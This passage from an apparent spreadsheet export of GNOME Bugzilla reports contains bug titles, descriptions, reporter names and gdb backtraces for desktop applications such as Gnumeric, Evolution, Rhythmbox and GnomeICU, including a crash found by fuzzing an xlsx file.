#9  0x00007ffff682b248 in xmlParseContent__internal_alias (ctxt=0x93bb40) at parser.c:9885
#10 0x00007ffff682ba1b in xmlParseElement__internal_alias (ctxt=0x93bb40) at parser.c:10058
#11 0x00007ffff682b248 in xmlParseContent__internal_alias (ctxt=0x93bb40) at parser.c:9885
#12 0x00007ffff682ba1b in xmlParseElement__internal_alias (ctxt=0x93bb40) at parser.c:10058
#13 0x00007ffff682decd in xmlParseDocument__internal_alias (ctxt=0x93bb40) at parser.c:10742
#14 0x00007ffff6dbd411 in gsf_xml_in_doc_parse (doc=0x921290 input=0x7c55d0 user_state=0x7fffffffdfc0) at gsf-libxml.c:1280
#15 0x00007fffe49276f9 in xlsx_parse_stream (state=0x7fffffffdfc0 in=0x7c55d0 dtd=0x7fffe4b856a0 ) at xlsx-read.c:344
#16 0x00007fffe4939afc in xlsx_wb_end (xin=0x7fffffffdea0 blob=0x0) at xlsx-read.c:3748
#17 0x00007ffff6dbc5b2 in gsf_xml_in_end_element (state=0x7fffffffdea0 name=0x8b21e7 workbook) at gsf-libxml.c:844
#18 0x00007ffff682762b in xmlParseEndTag1 (ctxt=0x7cb400 line=2) at parser.c:8683
#19 0x00007ffff682bb69 in xmlParseElement__internal_alias (ctxt=0x7cb400) at parser.c:10086
#20 0x00007ffff682decd in xmlParseDocument__internal_alias (ctxt=0x7cb400) at parser.c:10742
#21 0x00007ffff6dbd411 in gsf_xml_in_doc_parse (doc=0x87cfb0 input=0x7c5420 user_state=0x7fffffffdfc0) at gsf-libxml.c:1280
#22 0x00007fffe49276f9 in xlsx_parse_stream (state=0x7fffffffdfc0 in=0x7c5420 dtd=0x7fffe4b87560 ) at xlsx-read.c:344
#23 0x00007fffe493c365 in xlsx_file_open (fo=0x87f8c0 context=0x7c0050 wb_view=0x7c0120 input=0x7c2940) at xlsx-read.c:4792
#24 0x00007ffff749e6e2 in go_plugin_loader_module_func_file_open (fo=0x87f8c0 service=0x7cc360 io_context=0x7c0050 view=0x7c0120 input=0x7c2940 
    enc=0x0) at app/go-plugin-loader-module.c:282
#25 0x00007ffff74a05e9 in go_plugin_file_opener_open (fo=0x87f8c0 enc=0x0 io_context=0x7c0050 view=0x7c0120 input=0x7c2940)
    at app/go-plugin-service.c:685
#26 0x00007ffff74a326a in go_file_opener_open (fo=0x87f8c0 opt_enc=0x0 io_context=0x7c0050 view=0x7c0120 input=0x7c2940) at app/file.c:417
#27 0x00007ffff79d66f9 in workbook_view_new_from_input (input=0x7c2940 
    optional_uri=0x8a59f0 file:///home/jutaky/fuzzing/gnumeric_case_3089_7177.xlsx optional_fmt=0x87f8c0 io_context=0x7c0050 optional_enc=0x0)
    at workbook-view.c:1272
#28 0x00007ffff79d68c3 in workbook_view_new_from_uri (uri=0x8a59f0 file:///home/jutaky/fuzzing/gnumeric_case_3089_7177.xlsx optional_fmt=0x0 
    io_context=0x7c0050 optional_enc=0x0) at workbook-view.c:1332
#29 0x0000000000404a75 in main (argc=2 argv=0x7fffffffe768) at main-application.c:321
--
Juha KylmÃ¤nen
Research Assistant OUSPG</t>
  </si>
  <si>
    <t>jutaky</t>
  </si>
  <si>
    <t>GNOME-MEDIA-329922</t>
  </si>
  <si>
    <t>When recording multiple times items in record from input gets duplicated</t>
  </si>
  <si>
    <t>Open gnome-sound-recorder.
Click on the record button.
Click on the stop button.
Repeat the last two step 3 or 4 times.
Look at the record from input combo box and cry :-)
All items seem to be added again when you click on record or stop.</t>
  </si>
  <si>
    <t>RHYTHMBOX-405149</t>
  </si>
  <si>
    <t>Moving files to memory stick on Sony Ericsson K750i makes broken files</t>
  </si>
  <si>
    <t>output_formats for the device is: dbus.Array([dbus.String(u'audio/mpeg')] signature=dbus.Signature('s') variant_level=1)
Rhythmbox creates MPEG4 AAC audio and puts it on the device - my device does not even support MPEG4 AAC only MP3.
Also the encoded file comes out about 4 times as long as it should be with gaps at regular intervals maybe 4 gaps every 3 seconds. It seems the whole audio is encoded but there's so many gaps in it it causes the file to be 4 times too long.
Also the metadata for the file shows up in duplicates. For a FLAC file with artist Daniel Kandi and a title Child the song shows up as Child Child in the title column and Daniel Kandi Daniel Kandi in the artist column. The Nautilus property page for the file says the same (Child Child etc.) I guess the metadata isn't being added correctly.</t>
  </si>
  <si>
    <t>EVOLUTION-215781</t>
  </si>
  <si>
    <t>Cannot send messages after failed SMTP authentication.</t>
  </si>
  <si>
    <t>Description of Problem:
SMTP AUTH is hanging up if I use an incorrect password.
Steps to reproduce the problem:
1. Set up QMail
2. Use patch to qmail-smtpd from
http://www.cuni.cz/~vhor/qmail/smtpauth-en.html
3. Get checkpassword and other stuff working.
4. Set up an E-mail account and select Server Required Authentication
and use NT Authentication as the authentication method.
5. Send a message using the account and enter a wrong password. 
Actual Results:
Status bar says Sending ... but mail is never sent.
Expected Results:
Mail should be sent.
How often does this happen? 
It worked fine for me for about three hours then hung.
Additional Information:
Looking at ethereal it appears to repeatatively attempt the username and
password never giving up (thank god for the 2 second pause in qmail-smtpd).
I have not tested any other SMTP authentication servers.</t>
  </si>
  <si>
    <t>haddock</t>
  </si>
  <si>
    <t>GCONF-565297</t>
  </si>
  <si>
    <t>a --toggle option for gconftool</t>
  </si>
  <si>
    <t>The motivation for this patch is to enable keybindings that turn a11y tools on and off the a11y tools are started by g-s-d when a certain gconf key is set to true. 
Thus I want to add a keybinding that runs gconftool-2 --toggle /desktop/gnome/applications/at/screen_reader_enabled
This _could_ be done with a shell script but then I have to call gconftool twice and I have to decide how to call that script and where to install it and what package to ship it in. And Debian will demand a man page for it etc...</t>
  </si>
  <si>
    <t>GTK+-402806</t>
  </si>
  <si>
    <t>GtkAboutDialog showing empty contributors</t>
  </si>
  <si>
    <t>See attached test caseâ€¦</t>
  </si>
  <si>
    <t>NAUTILUS-84465</t>
  </si>
  <si>
    <t>[ui-review]Delete... should not have ellipsis.</t>
  </si>
  <si>
    <t>Delete.. should not have ellipsis. Deleting a file doesn't require further
input it just presents a confirmation alert.
http://developer.gnome.org/projects/gup/hig/draft_hig/menus.html</t>
  </si>
  <si>
    <t>TOTEM-401580</t>
  </si>
  <si>
    <t>[PATCH] undefined variable</t>
  </si>
  <si>
    <t>There is an undefined variable used in main.  The attached patch should allow building of the GTK+ only version of totem.</t>
  </si>
  <si>
    <t>GTK+-323752</t>
  </si>
  <si>
    <t>gdk_parse_args doesn't check g_option_context_parse's result correctly</t>
  </si>
  <si>
    <t>gdk_parse_args lacks a ! in the check of g_option_context_parse's result.  Patch
attached.</t>
  </si>
  <si>
    <t>EVOLUTION-523335</t>
  </si>
  <si>
    <t>[mail-to-task] Enhancements</t>
  </si>
  <si>
    <t>When you receive an email that you want to convert to a task then you simply right click it and choose Â«convert to taskÂ». You're then asked which tasklist you want the task created in press ok and nothing happens. At least it doesn't look like anything has happened. The task has been created and is available in the tasklist but you have to manually switch to the task view in order to confirm that. I think the task editor should be opened instead of asking the user which tasklist to use. There you can choose which tasklist to use and also add more details to it. 
While we're at it I think the new task should inherit some more properties from the email. By default the tasks start date should be equal to the time and date when you received the email. If a spesific startdate is necessary then the user can just change it. Otherwise the task starts today. Makes sense doesn't it? If the mail has a priority set then the task should inherit that too so that if the boss has marked the email as important the resulting task is too. My boss thinks it's important even if I don't. When a priority isn't set then a default priority of normal should be used. It would also be nice if the name and address of the sender could be added to the task somehow. Perhaps adding a line before the message body? Something like Converted from email from John Doe 
Other information:</t>
  </si>
  <si>
    <t>DEVHELP-477971</t>
  </si>
  <si>
    <t>Add build option to use Webkit</t>
  </si>
  <si>
    <t>There is a patch floating around that adds webkit support. It would be good to get this committed if nothing else as a test case for webkit.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-521087</t>
  </si>
  <si>
    <t>Use correct icon for stickynotes in about dialog</t>
  </si>
  <si>
    <t>ONTV-408789</t>
  </si>
  <si>
    <t>ONTV</t>
  </si>
  <si>
    <t>Using specified xmltv.xml files</t>
  </si>
  <si>
    <t>My country (Poland) is not on the list of countries that OnTV can download listings for and obtaining xmltv file for polish tv is a bit tricky. I have to use EpgDownloader (http://epgdownloader.sourceforge.net) to convert data from a website to regular xmltv file. Since it'd be hassle to support this or other similar cases I think choosing some local xmltv file is a needed feature (maybe in location wizard).</t>
  </si>
  <si>
    <t>ontv-maint</t>
  </si>
  <si>
    <t>mogiel</t>
  </si>
  <si>
    <t>GNOME-APPLETS-87496</t>
  </si>
  <si>
    <t>System Monitor help needs to get installed</t>
  </si>
  <si>
    <t>The System monitor applet is missing the Help selection from the
right-click menu.</t>
  </si>
  <si>
    <t>tcurtis</t>
  </si>
  <si>
    <t>REMOVABLE_MEDIA_MANAGER-123824</t>
  </si>
  <si>
    <t>REMOVABLE_MEDIA_MANAGER</t>
  </si>
  <si>
    <t>megabytes should be one word in rmm-utils</t>
  </si>
  <si>
    <t>#: gmedia_prop/gmedia_prop.c:427
msgid K bytes
#: gmedia_prop/gmedia_prop.c:429
msgid Mega bytes
#: gmedia_prop/gmedia_prop.c:431
msgid Giga bytes
This seems like both weird and inconsistent spelling.
It should be spelled kilobytes megabytes and gigabytes I think.</t>
  </si>
  <si>
    <t>rmm-maint</t>
  </si>
  <si>
    <t>EKIGA-442406</t>
  </si>
  <si>
    <t>ekiga listening socket trouble with ekiga.net account</t>
  </si>
  <si>
    <t>i'm connected through a dsl modem over a pppoe connection.
i have so a ppp0 interface with an ip address.
in the preferences i selected the ppp0 connection and all works like a charm.
once i started ekiga without ppp0 so listening socket was eth0 another interface with no internet access.
2 troubles:
1) since that moment the listening interface became eth0 and not ppp0 anymore.
next restart with ppp0 up ekiga listens on eth0 again.
after ekiga started ppp0 went up so internet connection available.
2) ekiga registered 4 accounts but not the ekiga.net one saying it's not applicable
selecting ppp0 as listening interface restarting ekiga solved the problem.
i have gizmo voipbuster wengo and skypho accounts and they work.
seems happining just with ekiga.net account.</t>
  </si>
  <si>
    <t>patrizio.bassi</t>
  </si>
  <si>
    <t>NAUTILUS-46186</t>
  </si>
  <si>
    <t>Do inventory inventory uploads at appropriate points in time</t>
  </si>
  <si>
    <t xml:space="preserve">Possibilities include:
* going to summary view
* going to update service
* goint to inventory page
* going to softcat home
* going to other softcat pages
* whenever an install is completed
------- Additional Comments From yakk@yakk.net 2001-02-04 23:03:37 ----
*** Bug 45098 has been marked as a duplicate of this bug. ***
------- Additional Comments From albert@eazel.com 2001-02-07 14:13:41 ----
QA assigning to Sherry (client inventory and vault components)
------- Additional Comments From don@eazel.com 2001-02-07 21:56:47 ----
This is a feature so it should be P2.
------- Additional Comments From yakk@yakk.net 2001-02-24 03:59:56 ----
Added upload hooks to:
 o summary view
 o install view
 o rpm view
We're pretty much in agreement that adding hooks to the mozilla view to upload
the inventory for particular URIs is evil and worng.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:57 -------
</t>
  </si>
  <si>
    <t>AT-SPI-132987</t>
  </si>
  <si>
    <t>Automake &gt;= 1.6 support</t>
  </si>
  <si>
    <t>at-spi fails to bootstrap if you use soemthing newer than 1.4. I suspect
1.5 fails but that version is so broken I didn't test.
I applied fixes for various Makefile.am's to make it work with current
automakes.
Please pay attention to #131304 and #131640 too they are somewhat related
to this.
Applying this patch is quite important automake1.4 is unsupported and
everything should have moved to 1.7 or 1.8 at this point.</t>
  </si>
  <si>
    <t>ADWAITA-ICON-THEME-167182</t>
  </si>
  <si>
    <t>gnome-mime-application-x-python.png should be gnome-mime-text-x-python.png</t>
  </si>
  <si>
    <t>The mimetype has been changed in the freedesktop base:
2004-12-10  Christophe Fergeau  
        * freedesktop.org.xml.in: change application/x-python to
        text/x-python fixes #208 please complain if you think this is wrong.
Now the .py files are displayed as text file. The icon should be changed from
gnome-mime-application-x-python.png to gnome-mime-text-x-python.png</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-98690</t>
  </si>
  <si>
    <t>Theme manager refuses to compile</t>
  </si>
  <si>
    <t>gcc -DHAVE_CONFIG_H -I. -I. -I../.. -I../..			
-I/gnome/head/INSTALL/include/metacity-1
-I/gnome/head/INSTALL/include/gtk-2.0
-I/gnome/head/INSTALL/lib/gtk-2.0/include
-I/gnome/head/INSTALL/include/atk-1.0
-I/gnome/head/INSTALL/include/pango-1.0 -I/gnome/head/INSTALL/include
-I/usr/include/freetype2 -I/usr/X11R6/include
-I/gnome/head/INSTALL/include/glib-2.0
-I/gnome/head/INSTALL/lib/glib-2.0/include  			-DORBIT2=1 -pthread
-I/gnome/head/INSTALL/include/gtk-2.0
-I/gnome/head/INSTALL/lib/gtk-2.0/include
-I/gnome/head/INSTALL/include/atk-1.0
-I/gnome/head/INSTALL/include/pango-1.0 -I/gnome/head/INSTALL/include
-I/usr/include/freetype2 -I/usr/X11R6/include
-I/gnome/head/INSTALL/include/glib-2.0
-I/gnome/head/INSTALL/lib/glib-2.0/include
-I/gnome/head/INSTALL/include/gconf/2
-I/gnome/head/INSTALL/include/orbit-2.0
-I/gnome/head/INSTALL/include/linc-1.0
-I/gnome/head/INSTALL/include/libgnomeui-2.0
-I/gnome/head/INSTALL/include/libgnome-2.0
-I/gnome/head/INSTALL/include/libgnomecanvas-2.0
-I/gnome/head/INSTALL/include/libart-2.0
-I/gnome/head/INSTALL/include/libbonoboui-2.0
-I/gnome/head/INSTALL/include/libbonobo-2.0
-I/gnome/head/INSTALL/include/gnome-vfs-2.0
-I/gnome/head/INSTALL/lib/gnome-vfs-2.0/include
-I/gnome/head/INSTALL/include/bonobo-activation-2.0
-I/gnome/head/INSTALL/include/libxml2
-I/gnome/head/INSTALL/include/libglade-2.0
-I/gnome/head/INSTALL/include/gnome-desktop-2.0   -I../../
-DG_LOG_DOMAIN=\-properties\
-DGNOMELOCALEDIR=\/gnome/head/INSTALL//share/locale\
-I../../capplets/common	
-DGLADEDIR=\/gnome/head/INSTALL//share/control-center-2.0/interfaces\ 
  -g -O2 -Wall -c theme-thumbnail.c
In file included from theme-thumbnail.c:4:
/gnome/head/INSTALL/include/metacity-1/metacity-private/theme.h:26:20:
common.h: No such file or directory
In file included from theme-thumbnail.c:4:
/gnome/head/INSTALL/include/metacity-1/metacity-private/theme.h:136:
`MAX_BUTTONS_PER_CORNER' undeclared here (not in a function)
/gnome/head/INSTALL/include/metacity-1/metacity-private/theme.h:139:
`MAX_BUTTONS_PER_CORNER' undeclared here (not in a function)
/gnome/head/INSTALL/include/metacity-1/metacity-private/theme.h:148:
confused by earlier errors bailing out
make: *** [theme-thumbnail.o] Error 1</t>
  </si>
  <si>
    <t>TOTEM-318817</t>
  </si>
  <si>
    <t>Missing ending period in totem message</t>
  </si>
  <si>
    <t>#: ../src/backend/bacon-video-widget-gst.c:3458
msgid 
The requested audio output was not found. Please select another audio output 
in the Multimedia Systems Selector
This message should probably end in a period like the other messages.</t>
  </si>
  <si>
    <t>GNOMEICU-101988</t>
  </si>
  <si>
    <t>gnome-icu crashes on messages.</t>
  </si>
  <si>
    <t xml:space="preserve">Package: GnomeICU
Severity: normal
Version: 0.98.131
Synopsis: gnome-icu crashes on messages.
Bugzilla-Product: GnomeICU
Bugzilla-Component: Message dialogs
BugBuddy-GnomeVersion: 2.0 (2.0.6)
Description:
Description of Problem:
gnomeicu crashes most of the times when i get messages
Steps to reproduce the problem:
1. get a message :)
2. 
3. 
Actual Results:
crashes
Expected Results:
to be able to see the mssage
How often does this happen?
most of the times
Additional Information:
using glib/gtk 2.2.0. i had a similer problem before using gtk 2.1.x but
i've been told that it's because gtk is unstable. welp 2.2.0 is pretty
stable and the problem reappears. thanks
Debugging Information:
Backtrace was generated from '/usr/bin/gnomeicu'
[New Thread 16384 (LWP 19544)]
[New Thread 32769 (LWP 19545)]
0x40a8c809 in wait4 () from /lib/libc.so.6
#0  0x40a8c809 in wait4 () from /lib/libc.so.6
#1  0x40b07200 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4088d863 in waitpid () from /lib/libpthread.so.0
#3  0x400883c5 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#4  0x4088f06a in __pthread_sighandler () from /lib/libpthread.so.0
#5  
#6  0x0807487e in open_message_dlg_with_message (contact=0x8286860 
    uin=0xfffffe00 
message_text=0xbfffeca8)
    at msg.c:369
#7  0x0806a0dd in icq_msgbox (message_text=0x8286860 
    uin=0x80f1e58 117541569) at gtkfunc.c:475
#8  0x08074dcc in show_contact_message (contact=0x80f1e58) at msg.c:532
#9  0x0806c2a5 in contacts_tree_activated_cb (treeview=0x80f1e58 
    arg1=0x8317ca0 arg2=0x8125468 user_data=0x0) at gtkfunc.c:1503
#10 0x402c2a3b in _gtk_marshal_VOID__BOXED_OBJECT ()
   from /usr/lib/libgtk-x11-2.0.so.0
#11 0x40780a18 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#12 0x40792c9e in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#13 0x40791db8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#14 0x40792034 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#15 0x4038cde9 in gtk_tree_view_row_activated ()
   from /usr/lib/libgtk-x11-2.0.so.0
#16 0x4037ff80 in gtk_tree_view_button_press ()
   from /usr/lib/libgtk-x11-2.0.so.0
#17 0x402c161f in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#18 0x40781077 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#19 0x40780a18 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#20 0x40792762 in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#21 0x40791b11 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#22 0x40792034 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#23 0x403a3a81 in gtk_widget_event_internal ()
   from /usr/lib/libgtk-x11-2.0.so.0
#24 0x402c1417 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
#25 0x402c0188 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#26 0x4047bcc3 in gdk_event_dispatch () from
/usr/lib/libgdk-x11-2.0.so.0
#27 0x407d81f5 in g_main_dispatch () from /usr/lib/libglib-2.0.so.0
#28 0x407d662c in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#29 0x407d867b in g_main_context_iterate () from
/usr/lib/libglib-2.0.so.0
#30 0x407d6bff in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#31 0x402bf9ff in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#32 0x08065770 in main (argc=0 argv=0xbffff7f4) at gnomeicu.c:640
#33 0x409f8a44 in __libc_start_main () from /lib/libc.so.6
Thread 2 (Thread 32769 (LWP 19545)):
#0  0x40ab123b in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x40888cd0 in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 16384 (LWP 19544)):
#0  0x40a8c809 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40b07200 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4088d863 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x400883c5 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x4088f06a in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  0x0807487e in open_message_dlg_with_message (contact=0x8286860 
    uin=0xfffffe00 
message_text=0xbfffeca8)
    at msg.c:369
	xml = (struct _GladeXML *) 0xbfffe7fc
	msg_dlg = (struct _GtkWidget *) 0x407fae24
	chat_toggle = (struct _GtkWidget *) 0x4c5f
	conversation = (struct _GtkWidget *) 0x80c6290
	input = (struct _GtkWidget *) 0x40b04320
	readnext_button = (struct _GtkWidget *) 0x8297960
	history_button = (struct _GtkWidget *) 0x4c5f
	usermenu_button = (struct _GtkWidget *) 0x0
	text_buffer = (struct _GtkTextBuffer *) 0x0
	end_iter = {dummy1 = 0x407fe238 dummy2 = 0x0 dummy3 = 0 
  dummy4 = 134784880 dummy5 = 135208536 dummy6 = 135208536 
  dummy7 = 135029392 dummy8 = 136865888 dummy9 = 0x80aa940 
  dummy10 = 0x80f1e58 dummy11 = -1073746840 dummy12 = 134652125 
  dummy13 = 134916416 dummy14 = 0x80f1e58}
#7  0x0806a0dd in icq_msgbox (message_text=0x8286860 
    uin=0x80f1e58 117541569) at gtkfunc.c:475
	contact = (struct _GSList *) 0x80aa940
#8  0x08074dcc in show_contact_message (contact=0x80f1e58) at msg.c:532
	msg = (struct {...} *) 0x80aa940
#9  0x0806c2a5 in contacts_tree_activated_cb (treeview=0x80f1e58 
    arg1=0x8317ca0 arg2=0x8125468 user_data=0x0) at gtkfunc.c:1503
	sel = (struct _GtkTreeSelection *) 0x8286860
	iter = {stamp = -1727377334 user_data = 0x80c5e38 user_data2 = 0x0 
  user_data3 = 0x0}
	model = (struct _GtkTreeModel *) 0x8121e68
	uid = (gchar *) 0x82a5568 117541569
	contact = (struct {...} *) 0x80f7080
	lcontact = (struct _GSList *) 0x8286860
#10 0x402c2a3b in _gtk_marshal_VOID__BOXED_OBJECT ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#11 0x40780a18 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x40792c9e in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#13 0x40791db8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0x40792034 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x4038cde9 in gtk_tree_view_row_activated ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#16 0x4037ff80 in gtk_tree_view_button_press ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#17 0x402c161f in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#18 0x40781077 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x40780a18 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0x40792762 in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0x40791b11 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#22 0x40792034 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#23 0x403a3a81 in gtk_widget_event_internal ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#24 0x402c1417 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#25 0x402c0188 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#26 0x4047bcc3 in gdk_event_dispatch () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#27 0x407d81f5 in g_main_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#28 0x407d662c in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#29 0x407d867b in g_main_context_iterate () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#30 0x407d6bff in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#31 0x402bf9ff in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#32 0x08065770 in main (argc=0 argv=0xbffff7f4) at gnomeicu.c:640
	client = (struct _GnomeClient *) 0x80aee20
	arguments = {{longName = 0x809e19f uin shortName = 117 'u' 
    argInfo = 1 arg = 0x80a562c val = 0 
    descrip = 0x809a363 Use the defined UIN argDescrip = 0x809a373
UIN} {
    longName = 0x809a377 ipaddr shortName = 105 'i' argInfo = 1 
    arg = 0x80a5630 val = 0 
    descrip = 0x809a37e Set IP address to send to ICQ 
    argDescrip = 0x809a39c IP} {longName = 0x809a39f geometry 
    shortName = 103 'g' argInfo = 1 arg = 0x80a5634 val = 0 
    descrip = 0x8099ea0 X geometry specification (see \X\ man page)
    argDescrip = 0x809a3a8 GEOMETRY} {longName = 0x0 shortName = 0
'\0' 
    argInfo = 0 arg = 0x0 val = 0 descrip = 0x0 argDescrip = 0x0}}
#33 0x409f8a44 in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#0  0x40a8c809 in wait4 () from /lib/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-12-26 09:31 -------
Unknown version unspecified in product GnomeICU. Setting version to 0.94.1.
Reassigning to the default owner of the component gnomeicu-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>ufk2k</t>
  </si>
  <si>
    <t>GNOME-PANEL-90235</t>
  </si>
  <si>
    <t>Pressing Enter when renaming workspace closes preferences</t>
  </si>
  <si>
    <t>While renaming your workspaces if you press Enter to indicate that you are
done entering the name the preferences dialog closes. I would suggest that
the focus should be removed from the Close button so that this does not
occur so that you can rename the other workspaces without having to
re-open the dialog.</t>
  </si>
  <si>
    <t>GNOME-DESKTOP-87450</t>
  </si>
  <si>
    <t>gnome-desktop-item needs function to get locale used for an attribute</t>
  </si>
  <si>
    <t>gnome-desktop-item needs a function that returns the current locale used
for an attribute in a desktop file.
For example the user's locale might be en_US.ISO8859-1. But attribute
FOO in the desktop file only has locales en and en_US in that case the
actual locale used for that attribute is en_US. Another attribute might
have locale en_US.ISO8859-1 available in that case the function would
return en_US.ISO8859-1.
The fact that this varies from attribute to attribute and is not always the
same as the users locale is important. This is also needed by ditem-edit to
fix an bug (which I will enter in a second and then marks this one as a
dependency).
I've attached a patch that implements this function.</t>
  </si>
  <si>
    <t>fworsley</t>
  </si>
  <si>
    <t>EVOLUTION-219920</t>
  </si>
  <si>
    <t>A message hides when in threaded view</t>
  </si>
  <si>
    <t>I received the two emails this morning which I will attach in a minute. 
When in non-threaded mode I can see both emails.  However when I thread
the message view one of the emails (the one addresses to me not the list)
disappears.  If I leave it unread it still shows up in the folder list.</t>
  </si>
  <si>
    <t>GNOME-CORE-35106</t>
  </si>
  <si>
    <t>systematic crash (gmenu Crash at 213.36.84.208)</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-core
Version: 1.2.3
Severity: 
&gt;Synopsis: systematic crash
&gt;Class: sw-bug
System: Debian Potato Gnome Helix 1.2
&gt;Description:
When I click on an item  gmenu crashes
even if I'm root
It's an updated gnome using apt-get
&gt;How-To-Repeat:
Click on an Item (not beeing root)
trying delete
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 15:10 -------
This bug was previously known as bug 35106 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=35106
Originally filed under the gnome-core product and general component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (redcrow64@free.fr) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>redcrow64</t>
  </si>
  <si>
    <t>GNOME-COMMANDER-344555</t>
  </si>
  <si>
    <t>Wrong sorting arrow direction</t>
  </si>
  <si>
    <t>Please describe the problem:
On a ascending sort the arrow is indicating an descending sort meaning it is oriented from top to bottomand viceversa on a descening sort the arrow is indicating an ascending sort meaning it is oriented from bottom to the top.
Steps to reproduce:
1. Click on the sorting bar to sort the files ascending by name or ext or size
Actual results:
The arrow is indicating a descending sort
Expected results:
The arrow should indicate the ascending sort
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>olimpiu.pascariu</t>
  </si>
  <si>
    <t>GTK+-393124</t>
  </si>
  <si>
    <t>misdrawing of tabs</t>
  </si>
  <si>
    <t>Steps to reproduce:
0) Start gtk+/tests/testnotebookdnd
1) Slowly decrease the window's height until the notebook in the bottom right place has only 1 tab shown and continue to decrease height
Results:
At one point the tab's height makes a jump becoming taller than the notebook. See attached screenshot.
gtk+ svn trunk from 2007-01-04.</t>
  </si>
  <si>
    <t>GSTREAMER-442689</t>
  </si>
  <si>
    <t>[neon] Property-related cleanups of neonhttpsrc</t>
  </si>
  <si>
    <t>- I don't understand why the element has a deprecated property (uri) it is still in -bad so it can break API.
 - The user-agent default value is plain neonhttpsrc which doesn't give anybody a clue out of context.  It should at least mention GStreamer in there.
 - There are some more or less serious formatting/spelling/style/expression problems in some property descriptions like explaining in full what a HTTP URL can look like (using newlines and tabs to make the novel line up in gst-inspect).
Marking as blocker for the release since I think that the deprecated property should die rather sooner than later.  Attaching trivial patch.</t>
  </si>
  <si>
    <t>GNOME-PYTHON-154452</t>
  </si>
  <si>
    <t>Add runtime check for pygtk version</t>
  </si>
  <si>
    <t xml:space="preserve">  gtk = PyImport_ImportModule(gtk)
  mdict = PyModule_GetDict(gtk)
  pygtk_version = PyDict_GetItemString(mdict pygtk_version)
  pygtk_required_version = Py_BuildValue((iii) 2 4 0)
  if (PyObject_Compare(pygtk_version pygtk_required_version) == -1) {
   g_warning(PyGTK %s required but %s found.
       PyString_AsString(PyObject_Repr(pygtk_required_version))
       PyString_AsString(PyObject_Repr(pygtk_version)))
   Py_DECREF(pygtk_required_version)
   return FALSE
  }
  Py_DECREF(pygtk_required_version)
 maybe we should add something like that to gnome-python</t>
  </si>
  <si>
    <t>GTK+-131808</t>
  </si>
  <si>
    <t>add a glossary to the api docs</t>
  </si>
  <si>
    <t>it should explain terms found in the api docs and the translatable
messages see bug 114351 for the problems translators have with technical
terms in messages.</t>
  </si>
  <si>
    <t>GNUMERIC-91320</t>
  </si>
  <si>
